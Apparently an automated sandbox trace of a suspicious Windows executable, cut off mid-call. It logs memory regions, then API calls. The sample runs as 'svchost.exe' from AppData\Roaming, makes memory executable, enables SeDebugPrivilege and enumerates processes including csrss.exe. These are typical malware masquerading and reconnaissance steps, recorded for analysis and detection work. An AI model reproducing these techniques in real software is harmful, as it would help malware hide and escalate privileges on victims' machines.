"\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 1106 start_va = 0xa80000 end_va = 0xa83fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1107 start_va = 0x1b410000 end_va = 0x1b475fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1108 start_va = 0xa90000 end_va = 0xa9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1109 start_va = 0xc30000 end_va = 0xc30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 1974 start_va = 0x1aee0000 end_va = 0x1afdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aee0000" filename = "" Region: id = 1975 start_va = 0xc40000 end_va = 0xc40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 1976 start_va = 0xe50000 end_va = 0xe53fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2074 start_va = 0x1b9a0000 end_va = 0x1ba9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b9a0000" filename = "" Region: id = 2437 start_va = 0xe60000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2438 start_va = 0x1a710000 end_va = 0x1a71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a710000" filename = "" Region: id = 2439 start_va = 0x1a720000 end_va = 0x1a72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a720000" filename = "" Region: id = 2440 start_va = 0xe60000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2441 start_va = 0x1a710000 end_va = 0x1a71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a710000" filename = "" Region: id = 2458 start_va = 0x1b960000 end_va = 0x1ba5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b960000" filename = "" Region: id = 2459 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2460 start_va = 0x1bb10000 end_va = 0x1bc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb10000" filename = "" Region: id = 2461 start_va = 0x7ffffef6000 end_va = 0x7ffffef7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffef6000" filename = "" Region: id = 2462 start_va = 0x7fefb200000 end_va = 0x7fefb233fff monitored = 0 entry_point = 0x7fefb201890 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 2463 start_va = 0x1bc10000 end_va = 0x1be0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bc10000" filename = "" Region: id = 2464 start_va = 0xff550000 end_va = 0xff55ffff monitored = 0 entry_point = 0xff553570 region_type = mapped_file name = "notepad.exe" filename = "\\Windows\\System32\\notepad.exe" (normalized: "c:\\windows\\system32\\notepad.exe") Region: id = 2494 start_va = 0xe60000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2512 start_va = 0xe60000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2513 start_va = 0x1aeb0000 end_va = 0x1afa2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001aeb0000" filename = "" Region: id = 2514 start_va = 0x7fef7a60000 end_va = 0x7fef7a67fff monitored = 0 entry_point = 0x7fef7a61030 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 2522 start_va = 0x7fefbb30000 end_va = 0x7fefbc59fff monitored = 0 entry_point = 0x7fefbb33810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 2523 start_va = 0x1b480000 end_va = 0x1b57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b480000" filename = "" Region: id = 2537 start_va = 0x1af00000 end_va = 0x1affffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001af00000" filename = "" Region: id = 2538 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2553 start_va = 0x7fef2e40000 end_va = 0x7fef3034fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Drawing\\ece80f2e3752a779e894fd45d8f27e64\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.drawing\\ece80f2e3752a779e894fd45d8f27e64\\system.drawing.ni.dll") Region: id = 2644 start_va = 0x7feedf20000 end_va = 0x7feeefc5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Windows.Forms\\b138f79dea860272ebe6694d9b73f656\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.windows.forms\\b138f79dea860272ebe6694d9b73f656\\system.windows.forms.ni.dll") Region: id = 2645 start_va = 0x7fe92750000 end_va = 0x7fe9275ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92750000" filename = "" Region: id = 2646 start_va = 0xe60000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2647 start_va = 0xe60000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2648 start_va = 0x7feed4a0000 end_va = 0x7feedf14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\0d59b0e237d7519417de10cd84bda4e7\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\0d59b0e237d7519417de10cd84bda4e7\\system.core.ni.dll") Region: id = 2649 start_va = 0x7fef2cb0000 end_va = 0x7fef2de2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\4beb1eeca20b27d4bd1bb9880f03cc2a\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\4beb1eeca20b27d4bd1bb9880f03cc2a\\system.configuration.ni.dll") Region: id = 2650 start_va = 0x7fef06b0000 end_va = 0x7fef0f5afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\5ee35debfc22f727e70e4479ddcbc045\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\5ee35debfc22f727e70e4479ddcbc045\\system.xml.ni.dll") Region: id = 2651 start_va = 0x1b680000 end_va = 0x1b71afff monitored = 0 entry_point = 0x1b6feb20 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 2652 start_va = 0x1b680000 end_va = 0x1b71afff monitored = 0 entry_point = 0x1b6feb20 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 2653 start_va = 0x7fef2c10000 end_va = 0x7fef2caffff monitored = 0 entry_point = 0x7fef2c8eb20 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 2654 start_va = 0x1ade0000 end_va = 0x1ae1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ade0000" filename = "" Region: id = 2655 start_va = 0x1b680000 end_va = 0x1b77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b680000" filename = "" Region: id = 2656 start_va = 0x7fe92760000 end_va = 0x7fe9276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92760000" filename = "" Region: id = 2657 start_va = 0xe60000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2658 start_va = 0xe60000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2659 start_va = 0x1a710000 end_va = 0x1a71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a710000" filename = "" Region: id = 2660 start_va = 0xe60000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2661 start_va = 0x1b940000 end_va = 0x1ba3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 2662 start_va = 0x7ffffef6000 end_va = 0x7ffffef7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffef6000" filename = "" Region: id = 2663 start_va = 0xe60000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2664 start_va = 0x7fefd760000 end_va = 0x7fefd773fff monitored = 0 entry_point = 0x7fefd7610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2665 start_va = 0xe60000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2666 start_va = 0x1bb10000 end_va = 0x1bc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb10000" filename = "" Region: id = 2667 start_va = 0x7ffffef4000 end_va = 0x7ffffef5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffef4000" filename = "" Region: id = 2668 start_va = 0x1a710000 end_va = 0x1a71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a710000" filename = "" Region: id = 2669 start_va = 0x1a720000 end_va = 0x1a72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a720000" filename = "" Region: id = 2670 start_va = 0x1a830000 end_va = 0x1a83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a830000" filename = "" Region: id = 2671 start_va = 0x1a840000 end_va = 0x1a8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a840000" filename = "" Region: id = 2672 start_va = 0x1be10000 end_va = 0x1bf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001be10000" filename = "" Region: id = 2673 start_va = 0x7ffffef6000 end_va = 0x7ffffef7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffef6000" filename = "" Region: id = 2674 start_va = 0xe60000 end_va = 0xe64fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2675 start_va = 0x1a710000 end_va = 0x1a71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a710000" filename = "" Region: id = 2676 start_va = 0x1a710000 end_va = 0x1a71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a710000" filename = "" Region: id = 2681 start_va = 0x7fe92770000 end_va = 0x7fe9277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92770000" filename = "" Region: id = 2684 start_va = 0x1b910000 end_va = 0x1ba0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b910000" filename = "" Thread: id = 11 os_tid = 0xedc [0058.900] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0059.405] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x23c9f8 | out: phkResult=0x23c9f8*=0x0) returned 0x2 [0059.406] RegCloseKey (hKey=0xffffffff80000002) returned 0x0 [0059.413] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0059.418] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0059.437] VirtualProtect (in: lpAddress=0xe72000, dwSize=0xff0dc, flNewProtect=0x40, lpflOldProtect=0x23dbf8 | out: lpflOldProtect=0x23dbf8*=0x80) returned 1 [0060.862] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x600, lpName=0x0) returned 0x24 [0060.862] memcpy (in: _Dst=0x130000, _Src=0x239c558, _Size=0x600 | out: _Dst=0x130000) returned 0x130000 [0060.862] CloseHandle (hObject=0x24) returned 1 [0062.141] GetEnvironmentVariableW (in: lpName="COR_ENABLE_PROFILING", lpBuffer=0x23d200, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.602] GetUserNameW (in: lpBuffer=0x23a010, pcbBuffer=0x23a338 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x23a338) returned 1 [0063.357] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x23df50 | out: lpLuid=0x23df50*(LowPart=0x14, HighPart=0)) returned 1 [0063.359] GetCurrentProcess () returned 0xffffffffffffffff [0063.359] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x23df48 | out: TokenHandle=0x23df48*=0x214) returned 1 [0063.360] AdjustTokenPrivileges (in: TokenHandle=0x214, DisableAllPrivileges=0, NewState=0x23ad2b0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0063.360] CloseHandle (hObject=0x214) returned 1 [0063.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12620b70, Length=0x20000, ResultLength=0x23ee80 | out: SystemInformation=0x12620b70, ResultLength=0x23ee80*=0x120c8) returned 0x0 [0063.431] GetCurrentProcessId () returned 0xed8 [0063.438] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb0) returned 0x214 [0063.446] EnumProcessModules (in: hProcess=0x214, lphModule=0x23ddb08, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x23ddb08, lpcbNeeded=0x23ee40) returned 1 [0063.448] GetModuleInformation (in: hProcess=0x214, hModule=0x9b0000, lpmodinfo=0x23ddd78, cb=0x18 | out: lpmodinfo=0x23ddd78*(lpBaseOfDll=0x9b0000, SizeOfImage=0x17000, EntryPoint=0x9b14a1)) returned 1 [0063.450] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.450] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x9b0000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="pidgin.exe") returned 0xa [0063.452] CoTaskMemFree (pv=0xd914b0) [0063.452] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.452] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x9b0000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Defender\\pidgin.exe" (normalized: "c:\\program files\\windows defender\\pidgin.exe")) returned 0x2c [0063.453] CoTaskMemFree (pv=0xd914b0) [0063.453] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x23dffe0, cb=0x18 | out: lpmodinfo=0x23dffe0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0063.454] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.454] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0063.454] CoTaskMemFree (pv=0xd914b0) [0063.454] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.454] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0063.456] CoTaskMemFree (pv=0xd914b0) [0063.456] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x23e21a0, cb=0x18 | out: lpmodinfo=0x23e21a0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0063.456] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.456] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0063.457] CoTaskMemFree (pv=0xd914b0) [0063.457] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.457] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0063.458] CoTaskMemFree (pv=0xd914b0) [0063.458] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x23e4360, cb=0x18 | out: lpmodinfo=0x23e4360*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0063.458] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.459] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0063.459] CoTaskMemFree (pv=0xd914b0) [0063.459] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.459] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0063.460] CoTaskMemFree (pv=0xd914b0) [0063.460] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x23e6530, cb=0x18 | out: lpmodinfo=0x23e6530*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0063.461] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.461] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0063.462] CoTaskMemFree (pv=0xd914b0) [0063.462] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.462] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0063.463] CoTaskMemFree (pv=0xd914b0) [0063.463] CloseHandle (hObject=0x214) returned 1 [0063.482] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0063.482] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x214 [0063.482] EnumProcessModules (in: hProcess=0x214, lphModule=0x23e8c50, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x23e8c50, lpcbNeeded=0x23ee40) returned 1 [0063.483] GetModuleInformation (in: hProcess=0x214, hModule=0x4a3d0000, lpmodinfo=0x23e8ec0, cb=0x18 | out: lpmodinfo=0x23e8ec0*(lpBaseOfDll=0x4a3d0000, SizeOfImage=0x6000, EntryPoint=0x4a3d1540)) returned 1 [0063.484] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.484] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x4a3d0000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="csrss.exe") returned 0x9 [0063.484] CoTaskMemFree (pv=0xd914b0) [0063.484] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.484] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x4a3d0000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\csrss.exe" (normalized: "c:\\windows\\system32\\csrss.exe")) returned 0x1d [0063.485] CoTaskMemFree (pv=0xd914b0) [0063.485] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x23eb0b8, cb=0x18 | out: lpmodinfo=0x23eb0b8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0063.485] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.485] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0063.486] CoTaskMemFree (pv=0xd914b0) [0063.486] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.486] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0063.487] CoTaskMemFree (pv=0xd914b0) [0063.487] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd800000, lpmodinfo=0x23ed278, cb=0x18 | out: lpmodinfo=0x23ed278*(lpBaseOfDll=0x7fefd800000, SizeOfImage=0x13000, EntryPoint=0x7fefd807c30)) returned 1 [0063.487] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.487] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd800000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="CSRSRV.dll") returned 0xa [0063.488] CoTaskMemFree (pv=0xd914b0) [0063.488] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.488] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd800000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CSRSRV.dll" (normalized: "c:\\windows\\system32\\csrsrv.dll")) returned 0x1e [0063.489] CoTaskMemFree (pv=0xd914b0) [0063.489] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd7e0000, lpmodinfo=0x23ef438, cb=0x18 | out: lpmodinfo=0x23ef438*(lpBaseOfDll=0x7fefd7e0000, SizeOfImage=0x11000, EntryPoint=0x7fefd7eb1ec)) returned 1 [0063.489] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.489] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd7e0000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="basesrv.DLL") returned 0xb [0063.490] CoTaskMemFree (pv=0xd914b0) [0063.490] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.490] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd7e0000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\basesrv.DLL" (normalized: "c:\\windows\\system32\\basesrv.dll")) returned 0x1f [0063.491] CoTaskMemFree (pv=0xd914b0) [0063.491] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd7a0000, lpmodinfo=0x23f15f8, cb=0x18 | out: lpmodinfo=0x23f15f8*(lpBaseOfDll=0x7fefd7a0000, SizeOfImage=0x38000, EntryPoint=0x7fefd7a27c0)) returned 1 [0063.491] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.491] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd7a0000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="winsrv.DLL") returned 0xa [0063.493] CoTaskMemFree (pv=0xd914b0) [0063.493] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.493] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd7a0000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\winsrv.DLL" (normalized: "c:\\windows\\system32\\winsrv.dll")) returned 0x1e [0063.494] CoTaskMemFree (pv=0xd914b0) [0063.494] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x23f3810, cb=0x18 | out: lpmodinfo=0x23f3810*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0063.495] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.495] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0063.495] CoTaskMemFree (pv=0xd914b0) [0063.496] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.496] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0063.496] CoTaskMemFree (pv=0xd914b0) [0063.496] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x23f59d0, cb=0x18 | out: lpmodinfo=0x23f59d0*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0063.497] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.497] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0063.498] CoTaskMemFree (pv=0xd914b0) [0063.498] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.498] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0063.499] CoTaskMemFree (pv=0xd914b0) [0063.499] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x23f7b90, cb=0x18 | out: lpmodinfo=0x23f7b90*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0063.500] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.500] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0063.501] CoTaskMemFree 